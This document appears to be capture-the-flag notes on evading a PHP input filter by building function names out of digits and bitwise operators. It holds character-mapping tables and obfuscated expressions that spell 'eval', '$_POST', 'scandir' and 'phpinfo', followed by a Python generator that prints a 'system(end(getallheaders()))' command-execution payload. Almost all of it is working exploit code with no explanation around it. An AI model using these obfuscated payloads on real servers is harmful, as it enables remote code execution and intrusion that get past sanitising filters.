array (
  1 => '1',
  2 => '2',
  3 => '3',
  4 => '4',
  5 => '5',
  6 => '6',
  7 => '7',
  8 => '8',
  9 => '9',
  0 => '0',
  '.' => '.',
  '-' => '-',
  '%00' => '%7E1%261',
  '%CE' => '%7E1%26%7E1',
  '%FF' => '%7E1%7C1',
  '%02' => '%7E1%262',
  '%01' => '1%26%7E2',
  '%CC' => '%7E1%26%7E2',
  '%FE' => '%7E1%7C2',
  '%FD' => '1%7C%7E2',
  '%CF' => '%7E1%7C%7E2',
  '%04' => '%7E1%264',
  '%CA' => '%7E1%26%7E4',
  '%FB' => '1%7C%7E4',
  '%06' => '%7E1%266',
  '%C8' => '%7E1%26%7E6',
  '%F9' => '1%7C%7E6',
  '%08' => '%7E1%268',
  '%C6' => '%7E1%26%7E8',
  '%F7' => '1%7C%7E8',
  '+' => '1%26.',
  '%0E' => '%7E1%26.',
  '%11' => '1%26%7E.',
  '%C0' => '%7E1%26%7E.',
  '%3F' => '1%7C.',
  '%EE' => '%7E1%7C.',
  '%F1' => '1%7C%7E.',
  '%DF' => '%7E1%7C%7E.',
  '%21' => '1%26-',
  '%0C' => '%7E1%26-',
  '%10' => '1%26%7E-',
  '%C2' => '%7E1%26%7E-',
  '%3D' => '1%7C-',
  '%EF' => '%7E1%7C-',
  '%F3' => '1%7C%7E-',
  '%DE' => '%7E1%7C%7E-',
  '%CD' => '%7E2%26%7E2',
  '%C9' => '%7E2%26%7E4',
  '%05' => '%7E2%265',
  '%FA' => '2%7C%7E5',
  '%C5' => '%7E2%26%7E8',
  '%3A' => '2%7C8',
  '%09' => '%7E2%269',
  '%C4' => '%7E2%26%7E9',
  '%3B' => '2%7C9',
  '%F6' => '2%7C%7E9',
  '%22' => '2%26.',
  '%C1' => '%7E2%26%7E.',
  '%3E' => '2%7C.',
  '%DD' => '%7E2%7C%7E.',
  '%0D' => '%7E2%26-',
  '%12' => '2%26%7E-',
  '%ED' => '%7E2%7C-',
  '%F2' => '2%7C%7E-',
  '%03' => '3%26%7E4',
  '%FC' => '%7E3%7C4',
  '%13' => '3%26%7E+',
  '%EC' => '%7E3%7C+',
  '%23' => '3%26%7E%10',
  '%DC' => '%7E3%7C%10',
  '%CB' => '%7E4%26%7E4',
  '%C3' => '%7E4%26%7E8',
  '%3C' => '4%7C8',
  '%24' => '4%26.',
  '%0A' => '%7E4%26.',
  '%F5' => '4%7C%7E.',
  '%DB' => '%7E4%7C%7E.',
  '%14' => '4%26%7E+',
  '%EB' => '%7E4%7C+',
  '%0B' => '%7E4%26%7E%C0',
  '%F4' => '4%7C%C0',
  '%25' => '5%26-',
  '%DA' => '%7E5%7C%7E-',
  '%15' => '5%26%7E+',
  '%EA' => '%7E5%7C+',
  '%26' => '6%26.',
  '%D9' => '%7E6%7C%7E.',
  '%16' => '6%26%7E+',
  '%E9' => '%7E6%7C+',
  '%07' => '7%26%7E8',
  '%F8' => '%7E7%7C8',
  '%17' => '7%26%7E+',
  '%E8' => '%7E7%7C+',
  '%27' => '7%26%7E%10',
  '%D8' => '%7E7%7C%10',
  '%C7' => '%7E8%26%7E8',
  '%28' => '8%26.',
  '%D7' => '%7E8%7C%7E.',
  '%18' => '8%26%7E+',
  '%E7' => '%7E8%7C+',
  '%29' => '9%26-',
  '%D6' => '%7E9%7C%7E-',
  '%19' => '9%26%7E+',
  '%E6' => '%7E9%7C+',
  '%0F' => '%7E0%26%7E%C0',
  '%F0' => '0%7C%C0',
  '%D1' => '%7E.%26%7E.',
  '%2C' => '.%26-',
  '%D0' => '%7E.%26%7E-',
  '%2F' => '.%7C-',
  '%D3' => '%7E.%7C%7E-',
  '%2A' => '.%26%7E%04',
  '%D5' => '%7E.%7C%04',
  '%D2' => '%7E-%26%7E-',
)
array (
  0 => '1',
  1 => '2',
  2 => '3',
  3 => '4',
  4 => '5',
  5 => '6',
  6 => '7',
  7 => '8',
  8 => '9',
  9 => '0',
  10 => '.',
  11 => '-',
  12 => '%00',
  13 => '%CE',
  14 => '%FF',
  15 => '%02',
  16 => '%01',
  17 => '%CC',
  18 => '%FE',
  19 => '%FD',
  20 => '%CF',
  21 => '%04',
  22 => '%CA',
  23 => '%FB',
  24 => '%06',
  25 => '%C8',
  26 => '%F9',
  27 => '%08',
  28 => '%C6',
  29 => '%F7',
  30 => '+',
  31 => '%0E',
  32 => '%11',
  33 => '%C0',
  34 => '%3F',
  35 => '%EE',
  36 => '%F1',
  37 => '%DF',
  38 => '%21',
  39 => '%0C',
  40 => '%10',
  41 => '%C2',
  42 => '%3D',
  43 => '%EF',
  44 => '%F3',
  45 => '%DE',
  46 => '%CD',
  47 => '%C9',
  48 => '%05',
  49 => '%FA',
  50 => '%C5',
  51 => '%3A',
  52 => '%09',
  53 => '%C4',
  54 => '%3B',
  55 => '%F6',
  56 => '%22',
  57 => '%C1',
  58 => '%3E',
  59 => '%DD',
  60 => '%0D',
  61 => '%12',
  62 => '%ED',
  63 => '%F2',
  64 => '%03',
  65 => '%FC',
  66 => '%13',
  67 => '%EC',
  68 => '%23',
  69 => '%DC',
  70 => '%CB',
  71 => '%C3',
  72 => '%3C',
  73 => '%24',
  74 => '%0A',
  75 => '%F5',
  76 => '%DB',
  77 => '%14',
  78 => '%EB',
  79 => '%0B',
  80 => '%F4',
  81 => '%25',
  82 => '%DA',
  83 => '%15',
  84 => '%EA',
  85 => '%26',
  86 => '%D9',
  87 => '%16',
  88 => '%E9',
  89 => '%07',
  90 => '%F8',
  91 => '%17',
  92 => '%E8',
  93 => '%27',
  94 => '%D8',
  95 => '%C7',
  96 => '%28',
  97 => '%D7',
  98 => '%18',
  99 => '%E7',
  100 => '%29',
  101 => '%D6',
  102 => '%19',
  103 => '%E6',
  104 => '%0F',
  105 => '%F0',
  106 => '%D1',
  107 => '%2C',
  108 => '%D0',
  109 => '%2F',
  110 => '%D3',
  111 => '%2A',
  112 => '%D5',
  113 => '%D2',
)

SECONDE:
array (
  1 => '1',
  2 => '2',
  3 => '3',
  4 => '4',
  5 => '5',
  6 => '6',
  7 => '7',
  8 => '8',
  9 => '9',
  0 => '0',
  '.' => '.',
  '-' => '-',
  '%00' => '%00',
  '%CE' => '%CE',
  '%FF' => '%FF',
  '%02' => '%02',
  '%01' => '%01',
  '%CC' => '%CC',
  '%FE' => '%FE',
  '%FD' => '%FD',
  '%CF' => '%CF',
  '%04' => '%04',
  '%CA' => '%CA',
  '%FB' => '%FB',
  '%06' => '%06',
  '%C8' => '%C8',
  '%F9' => '%F9',
  '%08' => '%08',
  '%C6' => '%C6',
  '%F7' => '%F7',
  '+' => '+',
  '%0E' => '%0E',
  '%11' => '%11',
  '%C0' => '%C0',
  '%3F' => '%3F',
  '%EE' => '%EE',
  '%F1' => '%F1',
  '%DF' => '%DF',
  '%21' => '%21',
  '%0C' => '%0C',
  '%10' => '%10',
  '%C2' => '%C2',
  '%3D' => '%3D',
  '%EF' => '%EF',
  '%F3' => '%F3',
  '%DE' => '%DE',
  '%CD' => '%CD',
  '%C9' => '%C9',
  '%05' => '%05',
  '%FA' => '%FA',
  '%C5' => '%C5',
  '%3A' => '%3A',
  '%09' => '%09',
  '%C4' => '%C4',
  '%3B' => '%3B',
  '%F6' => '%F6',
  '%22' => '%22',
  '%C1' => '%C1',
  '%3E' => '%3E',
  '%DD' => '%DD',
  '%0D' => '%0D',
  '%12' => '%12',
  '%ED' => '%ED',
  '%F2' => '%F2',
  '%03' => '%03',
  '%FC' => '%FC',
  '%13' => '%13',
  '%EC' => '%EC',
  '%23' => '%23',
  '%DC' => '%DC',
  '%CB' => '%CB',
  '%C3' => '%C3',
  '%3C' => '%3C',
  '%24' => '%24',
  '%0A' => '%0A',
  '%F5' => '%F5',
  '%DB' => '%DB',
  '%14' => '%14',
  '%EB' => '%EB',
  '%0B' => '%0B',
  '%F4' => '%F4',
  '%25' => '%25',
  '%DA' => '%DA',
  '%15' => '%15',
  '%EA' => '%EA',
  '%26' => '%26',
  '%D9' => '%D9',
  '%16' => '%16',
  '%E9' => '%E9',
  '%07' => '%07',
  '%F8' => '%F8',
  '%17' => '%17',
  '%E8' => '%E8',
  '%27' => '%27',
  '%D8' => '%D8',
  '%C7' => '%C7',
  '%28' => '%28',
  '%D7' => '%D7',
  '%18' => '%18',
  '%E7' => '%E7',
  '%29' => '%29',
  '%D6' => '%D6',
  '%19' => '%19',
  '%E6' => '%E6',
  '%0F' => '%0F',
  '%F0' => '%F0',
  '%D1' => '%D1',
  '%2C' => '%2C',
  '%D0' => '%D0',
  '%2F' => '%2F',
  '%D3' => '%D3',
  '%2A' => '%2A',
  '%D5' => '%D5',
  '%D2' => '%D2',
  '%E5' => '%7E%02%26%7E%18',
  '%1A' => '%02%7C%18',
  '%D4' => '%7E%02%26%7E%29',
  '%2B' => '%02%7C%29',
  '%E4' => '%7E%02%26%7E%19',
  '%1B' => '%02%7C%19',
  '%E3' => '%7E%04%26%7E%18',
  '%1C' => '%04%7C%18',
  '%E2' => '%7E%04%26%7E%19',
  '%1D' => '%04%7C%19',
  '%E1' => '%7E%04%26%E5',
  '%1E' => '%04%7C%7E%E5',
  '%E0' => '%7E%04%26%E4',
  '%1F' => '%04%7C%7E%E4',
)array (
  0 => '1',
  1 => '2',
  2 => '3',
  3 => '4',
  4 => '5',
  5 => '6',
  6 => '7',
  7 => '8',
  8 => '9',
  9 => '0',
  10 => '.',
  11 => '-',
  12 => '%00',
  13 => '%CE',
  14 => '%FF',
  15 => '%02',
  16 => '%01',
  17 => '%CC',
  18 => '%FE',
  19 => '%FD',
  20 => '%CF',
  21 => '%04',
  22 => '%CA',
  23 => '%FB',
  24 => '%06',
  25 => '%C8',
  26 => '%F9',
  27 => '%08',
  28 => '%C6',
  29 => '%F7',
  30 => '+',
  31 => '%0E',
  32 => '%11',
  33 => '%C0',
  34 => '%3F',
  35 => '%EE',
  36 => '%F1',
  37 => '%DF',
  38 => '%21',
  39 => '%0C',
  40 => '%10',
  41 => '%C2',
  42 => '%3D',
  43 => '%EF',
  44 => '%F3',
  45 => '%DE',
  46 => '%CD',
  47 => '%C9',
  48 => '%05',
  49 => '%FA',
  50 => '%C5',
  51 => '%3A',
  52 => '%09',
  53 => '%C4',
  54 => '%3B',
  55 => '%F6',
  56 => '%22',
  57 => '%C1',
  58 => '%3E',
  59 => '%DD',
  60 => '%0D',
  61 => '%12',
  62 => '%ED',
  63 => '%F2',
  64 => '%03',
  65 => '%FC',
  66 => '%13',
  67 => '%EC',
  68 => '%23',
  69 => '%DC',
  70 => '%CB',
  71 => '%C3',
  72 => '%3C',
  73 => '%24',
  74 => '%0A',
  75 => '%F5',
  76 => '%DB',
  77 => '%14',
  78 => '%EB',
  79 => '%0B',
  80 => '%F4',
  81 => '%25',
  82 => '%DA',
  83 => '%15',
  84 => '%EA',
  85 => '%26',
  86 => '%D9',
  87 => '%16',
  88 => '%E9',
  89 => '%07',
  90 => '%F8',
  91 => '%17',
  92 => '%E8',
  93 => '%27',
  94 => '%D8',
  95 => '%C7',
  96 => '%28',
  97 => '%D7',
  98 => '%18',
  99 => '%E7',
  100 => '%29',
  101 => '%D6',
  102 => '%19',
  103 => '%E6',
  104 => '%0F',
  105 => '%F0',
  106 => '%D1',
  107 => '%2C',
  108 => '%D0',
  109 => '%2F',
  110 => '%D3',
  111 => '%2A',
  112 => '%D5',
  113 => '%D2',
  114 => '%E5',
  115 => '%1A',
  116 => '%D4',
  117 => '%2B',
  118 => '%E4',
  119 => '%1B',
  120 => '%E3',
  121 => '%1C',
  122 => '%E2',
  123 => '%1D',
  124 => '%E1',
  125 => '%1E',
  126 => '%E0',
  127 => '%1F',
)
%&'()*+,-./0123456789:;<=>?@\^_{|}~
1/0 => INF
0/0 => NAN
0 0011 0000 ((0).(0)){0}
1 0011 0001 ((1).(0)){0}
2 0011 0010 ((2).(0)){0}
3 0011 0011 ((3).(0)){0}
4 0011 0100 ((4).(0)){0}
5 0011 0101 ((5).(0)){0}
6 0011 0110 ((6).(0)){0}
7 0011 0111 ((7).(0)){0}
8 0011 1000 ((8).(0)){0}
9 0011 1001 ((9).(0)){0}
- 0010 1101 ((-1).(0)){0}
. ((1.1).(0)){1}
E:0100 0101 ((10000000000000000000).(1)){3}
E:
p:((((10000000000000000000).(1)){3})&(~(((1).(7)){1})|(((1).(0)){1}))|(((1).(0)){1}))
p: 01110000
  0000 1111 ("."|"-")&(~"p")

$:  00100100  ((((-1).(0)){0})&(((4).(0)){0}))
_: 0101 1111 
l  ((((-1).(0)){0})&(((4).(0)){0}))|(~((0).(0)){0})&~((~((8).(0)){0})&(~((((10000000000000000000).(1)){3})&(~(((1).(7)){1})|(((1).(0)){1}))|(((1).(0)){1}))))
H (~((0).(0)){0})&~((~((8).(0)){0})&(~((((10000000000000000000).(1)){3})&(~(((1).(7)){1})|(((1).(0)){1}))|(((1).(0)){1}))))
Z  (~(((((-1).(0)){0})&(((4).(0)){0}))))&(~((~(((8).(0)){0}))&((~(((2).(0)){0}))&(~(((((10000000000000000000).(1)){3})&(~(((1).(7)){1})|(((1).(0)){1}))|(((1).(0)){1})))))))
v (((2).(0)){0})|((~((1).(0)){0})&((10000000000000000000).(1)){3})
D (~((1).(0)){0})&((10000000000000000000).(1)){3}
A (~((2).(0)){0})&(~((~((1).(0)){0})&(~((((10000000000000000000).(1)){3})&(~(((1).(7)){1})|(((1).(0)){1}))|(((1).(0)){1})))))
P (~((1.1).(0)){1})&((((10000000000000000000).(1)){3})&(~(((1).(7)){1})|(((1).(0)){1}))|(((1).(0)){1}))
O (~((0).(0)){0})&(~((~((8).(0)){0})&((~((2).(0)){0})&(~((10000000000000000000).(1)){3}))))
S (~((((-1).(0)){0})&(((4).(0)){0})))&(~((~((2).(0)){0})&(~((10000000000000000000).(1)){3})))
U (((10000000000000000000).(1)){3})|((~((((-1).(0)){0})&(((4).(0)){0})))&(~((~((1).(0)){0})&(~((1.1).(0)){2}))))
_ ((10000000000000000000).(1)){3}|(((~((((-1).(0)){0})&(((4).(0)){0})))&(~((~((1).(0)){0})&(~((1.1).(0)){1})))))
T (~(((1).(0)){0}&(~((2).(0)){0})))&(~((~((10000000000000000000).(1)){3})&(~(((1).(0)){0}&(~((1.1).(0)){1})))))
(EvAl)($_POST{1})
I (~(((0).(0)){0}))&(~((~((8).(0)){0})&((~((1).(0)){0})&(~((((10000000000000000000).(1)){3})&(~(((1).(7)){1})|(((1).(0)){1}))|(((1).(0)){1}))))))
N (~((0).(0)){0})&(~((~((8).(0)){0})&((~(((2).(0)){0}))&(~((~((1).(0)){0})&((10000000000000000000).(1)){3})))))
f ((((-1).(0)){0})&(((4).(0)){0}))|((~(((4).(0)){0}))&(~((~(((2).(0)){0}))&(~((((10000000000000000000).(1)){3})&(~(((1).(7)){1})|(((1).(0)){1}))|(((1).(0)){1}))))))
B (~(((4).(0)){0}))&(~((~(((2).(0)){0}))&(~((((10000000000000000000).(1)){3})&(~(((1).(7)){1})|(((1).(0)){1}))|(((1).(0)){1})))))
r (~((~(((2).(0)){0}))&(~((((10000000000000000000).(1)){3})&(~(((1).(7)){1})|(((1).(0)){1}))|(((1).(0)){1})))))
[ (~(((((-1).(0)){0})&(((4).(0)){0}))))&(~((~((8).(0)){0})&((~(((2).(0)){0}))&(~(((10000000000000000000).(1)){3})))))
] (((10000000000000000000).(1)){3})|((((8).(0)){0})&(~(((((-1).(0)){0})&(((4).(0)){0})))))
C (~(((4).(0)){0}))&(~((~(((2).(0)){0}))&(~(((10000000000000000000).(1)){3}))))
M (~(((0).(0)){0}))&(~((~(((8).(0)){0}))&(~(((10000000000000000000).(1)){3}))))
L ((~((((1).(0)){0}))&(~(((2).(0)){0})))&~((~(((10000000000000000000).(1)){3}))&~((((8).(0)){0})&(~(((((-1).(0)){0})&(((4).(0)){0})))))))
\ (~(((((1).(0)){0}))&(~(((2).(0)){0})))&~((~(((10000000000000000000).(1)){3}))&~((((8).(0)){0})&(~(((((-1).(0)){0})&(((4).(0)){0})))))))
/ ((((1.1).(0)){1})|(((-1).(0)){0}))
G (~(((8).(0)){0}))&(~((~(((2).(0)){0}))&(~(((10000000000000000000).(1)){3}))))
g (((10000000000000000000).(1)){3})|((((2).(0)){0})&(((1.1).(0)){1}))
y (((((1).(0)){0})&((~((2).(0)){0})))|((((((10000000000000000000).(1)){3})&(~(((1).(7)){1})|(((1).(0)){1}))|(((1).(0)){1})))&(~((((1).(0)){0})&(~(((1.1).(0)){1})))))|((9).(9)){0})
a ((((1).(0)){0})&((~((2).(0)){0})))|((((((10000000000000000000).(1)){3})&(~(((1).(7)){1})|(((1).(0)){1}))|(((1).(0)){1})))&(~((((1).(0)){0})&(~(((1.1).(0)){1})))))
var_dump(scandir(..)) (((((2).(0)){0})|((~((1).(0)){0})&((10000000000000000000).(1)){3})).((~((2).(0)){0})&(~((~((1).(0)){0})&(~((((10000000000000000000).(1)){3})&(~(((1).(7)){1})|(((1).(0)){1}))|(((1).(0)){1})))))).((~((~(((2).(0)){0}))&(~((((10000000000000000000).(1)){3})&(~(((1).(7)){1})|(((1).(0)){1}))|(((1).(0)){1})))))).(((10000000000000000000).(1)){3}|(((~((((-1).(0)){0})&(((4).(0)){0})))&(~((~((1).(0)){0})&(~((1.1).(0)){1})))))).((~((1).(0)){0})&((10000000000000000000).(1)){3}).((((10000000000000000000).(1)){3})|((~((((-1).(0)){0})&(((4).(0)){0})))&(~((~((1).(0)){0})&(~((1.1).(0)){2}))))).((~(((0).(0)){0}))&(~((~(((8).(0)){0}))&(~(((10000000000000000000).(1)){3}))))).((~((1.1).(0)){1})&((((10000000000000000000).(1)){3})&(~(((1).(7)){1})|(((1).(0)){1}))|(((1).(0)){1}))))((((~((((-1).(0)){0})&(((4).(0)){0})))&(~((~((2).(0)){0})&(~((10000000000000000000).(1)){3})))).((~(((4).(0)){0}))&(~((~(((2).(0)){0}))&(~(((10000000000000000000).(1)){3}))))).((~((2).(0)){0})&(~((~((1).(0)){0})&(~((((10000000000000000000).(1)){3})&(~(((1).(7)){1})|(((1).(0)){1}))|(((1).(0)){1})))))).((~((0).(0)){0})&(~((~((8).(0)){0})&((~(((2).(0)){0}))&(~((~((1).(0)){0})&((10000000000000000000).(1)){3})))))).((~((1).(0)){0})&((10000000000000000000).(1)){3}).((~(((0).(0)){0}))&(~((~((8).(0)){0})&((~((1).(0)){0})&(~((((10000000000000000000).(1)){3})&(~(((1).(7)){1})|(((1).(0)){1}))|(((1).(0)){1}))))))).((~((~(((2).(0)){0}))&(~((((10000000000000000000).(1)){3})&(~(((1).(7)){1})|(((1).(0)){1}))|(((1).(0)){1})))))))((((1.1).(0)){1}).(((1.1).(0)){1}).((~(((((1).(0)){0}))&(~(((2).(0)){0})))&~((~(((10000000000000000000).(1)){3}))&~((((8).(0)){0})&(~(((((-1).(0)){0})&(((4).(0)){0}))))))))))
EvAl ((((10000000000000000000).(1)){3}).((((2).(0)){0})|((~((1).(0)){0})&((10000000000000000000).(1)){3})).((~((2).(0)){0})&(~((~((1).(0)){0})&(~((((10000000000000000000).(1)){3})&(~(((1).(7)){1})|(((1).(0)){1}))|(((1).(0)){1})))))).(((((-1).(0)){0})&(((4).(0)){0}))|(~((0).(0)){0})&~((~((8).(0)){0})&(~((((10000000000000000000).(1)){3})&(~(((1).(7)){1})|(((1).(0)){1}))|(((1).(0)){1}))))))

scandir (((~((((-1).(0)){0})&(((4).(0)){0})))&(~((~((2).(0)){0})&(~((10000000000000000000).(1)){3})))).((~(((4).(0)){0}))&(~((~(((2).(0)){0}))&(~(((10000000000000000000).(1)){3}))))).((~((2).(0)){0})&(~((~((1).(0)){0})&(~((((10000000000000000000).(1)){3})&(~(((1).(7)){1})|(((1).(0)){1}))|(((1).(0)){1})))))).((~((0).(0)){0})&(~((~((8).(0)){0})&((~(((2).(0)){0}))&(~((~((1).(0)){0})&((10000000000000000000).(1)){3})))))).((~((1).(0)){0})&((10000000000000000000).(1)){3}).((~(((0).(0)){0}))&(~((~((8).(0)){0})&((~((1).(0)){0})&(~((((10000000000000000000).(1)){3})&(~(((1).(7)){1})|(((1).(0)){1}))|(((1).(0)){1}))))))).((~((~(((2).(0)){0}))&(~((((10000000000000000000).(1)){3})&(~(((1).(7)){1})|(((1).(0)){1}))|(((1).(0)){1})))))))
var_dump (((((2).(0)){0})|((~((1).(0)){0})&((10000000000000000000).(1)){3})).((~((2).(0)){0})&(~((~((1).(0)){0})&(~((((10000000000000000000).(1)){3})&(~(((1).(7)){1})|(((1).(0)){1}))|(((1).(0)){1})))))).((~((~(((2).(0)){0}))&(~((((10000000000000000000).(1)){3})&(~(((1).(7)){1})|(((1).(0)){1}))|(((1).(0)){1})))))).(((10000000000000000000).(1)){3}|(((~((((-1).(0)){0})&(((4).(0)){0})))&(~((~((1).(0)){0})&(~((1.1).(0)){1})))))).((~((1).(0)){0})&((10000000000000000000).(1)){3}).((((10000000000000000000).(1)){3})|((~((((-1).(0)){0})&(((4).(0)){0})))&(~((~((1).(0)){0})&(~((1.1).(0)){2}))))).((~(((0).(0)){0}))&(~((~(((8).(0)){0}))&(~(((10000000000000000000).(1)){3}))))).((~((1.1).(0)){1})&((((10000000000000000000).(1)){3})&(~(((1).(7)){1})|(((1).(0)){1}))|(((1).(0)){1}))))
[1] ((~(((((-1).(0)){0})&(((4).(0)){0}))))&(~((~((8).(0)){0})&((~(((2).(0)){0}))&(~(((10000000000000000000).(1)){3})))))).(1).((((10000000000000000000).(1)){3})|((((8).(0)){0})&(~(((((-1).(0)){0})&(((4).(0)){0}))))))
$_POST (((((-1).(0)){0})&(((4).(0)){0}))).(((10000000000000000000).(1)){3}|(((~((((-1).(0)){0})&(((4).(0)){0})))&(~((~((1).(0)){0})&(~((1.1).(0)){1})))))).((~((1.1).(0)){1})&((((10000000000000000000).(1)){3})&(~(((1).(7)){1})|(((1).(0)){1}))|(((1).(0)){1}))).((~((0).(0)){0})&(~((~((8).(0)){0})&((~((2).(0)){0})&(~((10000000000000000000).(1)){3}))))).((~((((-1).(0)){0})&(((4).(0)){0})))&(~((~((2).(0)){0})&(~((10000000000000000000).(1)){3})))).((~(((1).(0)){0}&(~((2).(0)){0})))&(~((~((10000000000000000000).(1)){3})&(~(((1).(0)){0}&(~((1.1).(0)){1}))))))
phpinfo():(((~((1.1).(0)){1})&((((10000000000000000000).(1)){3})&(~(((1).(7)){1})|(((1).(0)){1}))|(((1).(0)){1}))).((~((0).(0)){0})&~((~((8).(0)){0})&(~((((10000000000000000000).(1)){3})&(~(((1).(7)){1})|(((1).(0)){1}))|(((1).(0)){1}))))).(((~((1.1).(0)){1})&((((10000000000000000000).(1)){3})&(~(((1).(7)){1})|(((1).(0)){1}))|(((1).(0)){1})))).((~(((0).(0)){0}))&(~((~((8).(0)){0})&((~((1).(0)){0})&(~((((10000000000000000000).(1)){3})&(~(((1).(7)){1})|(((1).(0)){1}))|(((1).(0)){1}))))))).((~((0).(0)){0})&(~((~((8).(0)){0})&((~(((2).(0)){0}))&(~((~((1).(0)){0})&((10000000000000000000).(1)){3})))))).(((((-1).(0)){0})&(((4).(0)){0}))|((~(((4).(0)){0}))&(~((~(((2).(0)){0}))&(~((((10000000000000000000).(1)){3})&(~(((1).(7)){1})|(((1).(0)){1}))|(((1).(0)){1}))))))).((~((0).(0)){0})&(~((~((8).(0)){0})&((~((2).(0)){0})&(~((10000000000000000000).(1)){3}))))))()

python脚本

arr={
    "0":'''((0).(0)){0}''',
    "1":'''((1).(0)){0}''',
    "2":'''((2).(0)){0}''',
    "3":'''((3).(0)){0}''',
    "4":'''((4).(0)){0}''',
    "5":'''((5).(0)){0}''',
    "6":'''((6).(0)){0}''',
    "7":'''((7).(0)){0}''',
    "8":'''((8).(0)){0}''',
    "9":'''((9).(0)){0}''',
    "-": "((-1).(0)){0}",
    "." :"((1.1).(0)){1}",
    "E": "((10000000000000000000).(1)){3}",
    "e":"(((((1).(0)){0})&((~((2).(0)){0})))|((((((10000000000000000000).(1)){3})&(~(((1).(7)){1})|(((1).(0)){1}))|(((1).(0)){1})))&(~((((1).(0)){0})&(~(((1.1).(0)){1})))))|(~((1).(0)){0})&((10000000000000000000).(1)){3})",
    "p":"((((10000000000000000000).(1)){3})&(~(((1).(7)){1})|(((1).(0)){1}))|(((1).(0)){1}))",
    "$":"((((-1).(0)){0})&(((4).(0)){0}))",
    "l":"((((-1).(0)){0})&(((4).(0)){0}))|(~((0).(0)){0})&~((~((8).(0)){0})&(~((((10000000000000000000).(1)){3})&(~(((1).(7)){1})|(((1).(0)){1}))|(((1).(0)){1}))))",
    "H": "(~((0).(0)){0})&~((~((8).(0)){0})&(~((((10000000000000000000).(1)){3})&(~(((1).(7)){1})|(((1).(0)){1}))|(((1).(0)){1}))))",
    "Z" : "(~(((((-1).(0)){0})&(((4).(0)){0}))))&(~((~(((8).(0)){0}))&((~(((2).(0)){0}))&(~(((((10000000000000000000).(1)){3})&(~(((1).(7)){1})|(((1).(0)){1}))|(((1).(0)){1})))))))",
    "v" :"(((2).(0)){0})|((~((1).(0)){0})&((10000000000000000000).(1)){3})",
    "D" :"(~((1).(0)){0})&((10000000000000000000).(1)){3}",
    "A" :"(~((2).(0)){0})&(~((~((1).(0)){0})&(~((((10000000000000000000).(1)){3})&(~(((1).(7)){1})|(((1).(0)){1}))|(((1).(0)){1})))))",
    "P" :"(~((1.1).(0)){1})&((((10000000000000000000).(1)){3})&(~(((1).(7)){1})|(((1).(0)){1}))|(((1).(0)){1}))",
    "O" :"(~((0).(0)){0})&(~((~((8).(0)){0})&((~((2).(0)){0})&(~((10000000000000000000).(1)){3}))))",
    "S" :"(~((((-1).(0)){0})&(((4).(0)){0})))&(~((~((2).(0)){0})&(~((10000000000000000000).(1)){3})))",
    "U" :"(((10000000000000000000).(1)){3})|((~((((-1).(0)){0})&(((4).(0)){0})))&(~((~((1).(0)){0})&(~((1.1).(0)){2}))))",
    "_" :"((10000000000000000000).(1)){3}|(((~((((-1).(0)){0})&(((4).(0)){0})))&(~((~((1).(0)){0})&(~((1.1).(0)){1})))))",
    "T" :"(~(((1).(0)){0}&(~((2).(0)){0})))&(~((~((10000000000000000000).(1)){3})&(~(((1).(0)){0}&(~((1.1).(0)){1})))))",
    "I" :"(~(((0).(0)){0}))&(~((~((8).(0)){0})&((~((1).(0)){0})&(~((((10000000000000000000).(1)){3})&(~(((1).(7)){1})|(((1).(0)){1}))|(((1).(0)){1}))))))",
    "N" :"(~((0).(0)){0})&(~((~((8).(0)){0})&((~(((2).(0)){0}))&(~((~((1).(0)){0})&((10000000000000000000).(1)){3})))))",
    "f" :"((((-1).(0)){0})&(((4).(0)){0}))|((~(((4).(0)){0}))&(~((~(((2).(0)){0}))&(~((((10000000000000000000).(1)){3})&(~(((1).(7)){1})|(((1).(0)){1}))|(((1).(0)){1}))))))",
    "B" :"(~(((4).(0)){0}))&(~((~(((2).(0)){0}))&(~((((10000000000000000000).(1)){3})&(~(((1).(7)){1})|(((1).(0)){1}))|(((1).(0)){1})))))",
    "r" :"(~((~(((2).(0)){0}))&(~((((10000000000000000000).(1)){3})&(~(((1).(7)){1})|(((1).(0)){1}))|(((1).(0)){1})))))",
    "[" :"(~(((((-1).(0)){0})&(((4).(0)){0}))))&(~((~((8).(0)){0})&((~(((2).(0)){0}))&(~(((10000000000000000000).(1)){3})))))",
    "]" :"(((10000000000000000000).(1)){3})|((((8).(0)){0})&(~(((((-1).(0)){0})&(((4).(0)){0})))))",
    "C":"(~(((4).(0)){0}))&(~((~(((2).(0)){0}))&(~(((10000000000000000000).(1)){3}))))",
    "M":"(~(((0).(0)){0}))&(~((~(((8).(0)){0}))&(~(((10000000000000000000).(1)){3}))))",
    "\\":"(~(((((1).(0)){0}))&(~(((2).(0)){0})))&~((~(((10000000000000000000).(1)){3}))&~((((8).(0)){0})&(~(((((-1).(0)){0})&(((4).(0)){0})))))))",
    "/":"((((1.1).(0)){1})|(((-1).(0)){0}))",
    "G":"(~(((8).(0)){0}))&(~((~(((2).(0)){0}))&(~(((10000000000000000000).(1)){3}))))",
    "g":"(((10000000000000000000).(1)){3})|((((2).(0)){0})&(((1.1).(0)){1}))",
    "a":"((((1).(0)){0})&((~((2).(0)){0})))|((((((10000000000000000000).(1)){3})&(~(((1).(7)){1})|(((1).(0)){1}))|(((1).(0)){1})))&(~((((1).(0)){0})&(~(((1.1).(0)){1})))))",
	"y":"(((((1).(0)){0})&((~((2).(0)){0})))|((((((10000000000000000000).(1)){3})&(~(((1).(7)){1})|(((1).(0)){1}))|(((1).(0)){1})))&(~((((1).(0)){0})&(~(((1.1).(0)){1})))))|((9).(9)){0})"
	}
arr["d"]="((%s)&(%s))"%(arr["g"],arr["l"])
s="scandir"
def topayload(s):
    result=""
    for i in s:
        if(i in arr):
            result+=("("+arr[i]+")"+".")
            continue
        if(i.upper() in arr):
            result+=("("+arr[i.upper()]+")"+".")
            continue
        if(i.lower() in arr):
            result+=("("+arr[i.lower()]+")"+".")
    return result[:-1]
def tomethod(meth,para,c=True):
    if c:
        return "("+topayload(meth)+")("+topayload(para)+")"
    else :
        return "("+topayload(meth)+")("+(para)+")"
# print(tomethod("var_dump",tomethod("scandir","/"),False))
#end(getallheaders())
print(tomethod("system",tomethod("end",tomethod("getallheaders",""),False),False))
#print(tomethod("assert","/readflag"))
# print(tomethod("file_get_contents","/f1agg"))